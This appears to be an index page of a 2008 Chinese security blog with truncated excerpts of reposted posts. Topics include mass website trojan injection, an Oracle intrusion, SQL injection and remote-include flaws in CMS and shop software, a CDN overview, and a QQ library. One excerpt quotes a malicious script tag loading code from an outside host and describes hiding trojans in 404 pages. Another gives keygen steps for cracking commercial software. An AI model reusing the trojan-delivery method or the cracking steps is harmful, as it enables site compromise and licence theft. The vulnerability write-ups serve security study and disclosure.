对趋势科技等数万网站被攻击的分析

2008/03/19 12:47 | 鬼仔 | 技术文章 | 消灭0留言

作者:茄子宝
来源:半吊子跨站师~茄子宝

一. 首先在网上找到了这次攻击的新闻报道

http://www.nsfocus.net/news/6697

http://hi.baidu.com/secway/blog/item/e80d8efa4bf73ddab48f31a3.html

通过GOOGLE搜索到了相关被黑的页面

http://www.google.cn/search?hl=zh-CN&q=site%3Atrendmicro.com++www.2117966.net+fuckjp.js&btnG=Google+%E6%90%9C%E7%B4%A2&meta=&aq=f

趋势科技的页面被插入过http://www.2117966.net/fuckjp.js相关的JS挂马。
阅读全文 »

Tags:

一次通过 Oracle8i 入侵系统之旅

2008/03/19 12:40 | 鬼仔 | 技术文章 | 消灭0留言

来源:冷漠’s Blog
Author:Mickey
最近看了些有关 Oracle 的安全资料,看后随手做了一个渗透测试,把过程记录下来方便日后查阅.。先用 SuperScan4.0 扫描下要测试的主机,速度很快,结果如图 1 所示:
阅读全文 »

Tags:

CreateLive CMS Version 4.0 0day

2008/03/19 12:39 | 鬼仔 | 工具收集 | 才 1 条评论

来源:xn_ice的blog
CreateLive CMS Version 4.0 0day.doc
by:xiaok q:391232032.771044833 time: 2008-2-4 02:10 xpsp2 ie7 iis5.1 ……
致敬D.S.T的各位同志,致Hell-Phantom,致on thin ice,致老D,致Doom,致群里那帮有文化的流氓……

漏洞之一

来源kingcms\User\User_Comment.asp CommentID
sub SaveModify()

……
CommentID=Trim(Request("CommentID")) '注入
……
if CommentID="" then
FoundErr=True
ErrMsg=ErrMsg & "<br /><li>请指定评论ID</li>"
阅读全文 »

Tags: ,

404挂马 + 杂谈 + AD

2008/03/19 1:41 | 鬼仔 | 技术文章 | 消灭0留言

来源:六翼刺猬的某某刺猬窝
http://www.688ip.com/dae5g45
今天在卡饭看到的被说是挂马的东西,想要获取源码但返回了404;

细心一看,的确被挂马了,从服务器那里返回的404信息里面包含了挂马代码:
<script src=”http://ad.shitip.com/file/da.js”></script>
貌似最近第三次看到了;

P.S. 某服务器返回的404信息是可以自定义的,如Google的那些:http://www.google.com/2.htm

细想一下,这样是一个不错的挂马选择:

先把挂马代码插入到要返回的404信息里面;

然后才在正常的页面里面写入<iframe>框架或者<script>脚本,src指向本地域名的一个无效URL;
阅读全文 »

Tags: ,

大型门户网站的cdn部署

2008/03/19 1:37 | 鬼仔 | 技术文章 | 消灭0留言

来源:PHP China

新浪采用了ChinaCache做的CDN系统,ChinaCache在全国分布了四十多个点,同时采用基于动态DNS分配的全球服务器负载均衡技术。
  从新浪的站点结构可以看出:
  > www.sina.com.cn
  Server: UnKnown
  Address: 192.168.1.254
  Non-authoritative answer:
  Name: libra.sina.com.cn
  Addresses: 61.135.152.71, 61.135.152.72, 61.135.152.73,61.135.152.74 61.135.152.75, 61.135.152.76, 61.135.153.181,61.135.153.182, 阅读全文 »

Tags:

ShopEx PHP远程包含漏洞

2008/03/19 1:36 | 鬼仔 | 技术文章 | 消灭0留言

鬼仔注:未测试。

文章作者:寂寞hacker
信息来源:http://hi.baidu.com/isbx/

影响版本:4.7及以下

verifycode.php

<?php
/**
*
* 登陆验证码生成文件
*
* @package ShopEx网上商店系统
* @version 4.6
* @author ShopEx.cn <[email protected]>
* @url http://www.shopex.cn/
* @since PHP 4.3
* @copyright ShopEx.cn
*
**/
if (!defined("ISSHOP"))
{
Header("Location:../index.php");
exit;
阅读全文 »

Tags: , , ,

LumaQQ.NET第二个预览版

2008/03/19 1:32 | 鬼仔 | 乱七八糟 | 才 1 条评论

阿不 http://hjf1223.cnblogs.com

  版权声明:该开源开发包,是基于LumaQQ的基于等价移植到.NET平台下,开发者不直接参与QQ协议的分析工作,移植到.NET平台纯粹是为了方便广大.NET开发者学习和研究之用,并且没有产生任何直接的经济效益,并且纯粹是个人的技术学习研究行为,与本人所在单位没有任何关系。此开发包的用户在使用过程产生的效益和涉及的法律责任与本人没有直接关系。如果影响到您或您的公司利益,敬请谅解并且与我联系,本人会第一时间作出处理。本系列章首发且单发于博客园,由于各种原因不欢迎转载本系列文章,如果您转载了该系列文章请自行承担责任并且转载完整版本,包括版权声明。

在LumaQQ.NET发布首个预览版后,受到的关注和热情出乎我的意料和想像。尽管还只是 阅读全文 »

Tags: ,

WinConnect Server XP 多用户远程桌面服务器

2008/03/19 1:28 | 鬼仔 | 工具收集 | 消灭0留言

来源:黑鹰

WinConnect Server XP能够安装在XP系统下(ps:本人在win2003系统下一样能用HAPPY!!),不受XP系统1用户远程连接限制,并最多支持21个客户端的同时并发连接数,支持24位真彩画面、音频传播,可自定连接方式,支持对客户端发送消息,支持有线或无线TCP/IP协议连接,例如LAN、WAN、 dial-up (Internet)、DSL\ADSL、ISDN、VPN,支持128位加密。每个客户端连接需要增加64MB内存。
破解方法:
1. 安装 V 2.00.204 版本原程序,重启。
2. 将patch目录下的文件拷贝到软件的安装目录下,并在当前目录下运行命令行程序,输入:
keygen.exe -r -u 21 或 直接运行register.cmd文件,重启。
阅读全文 »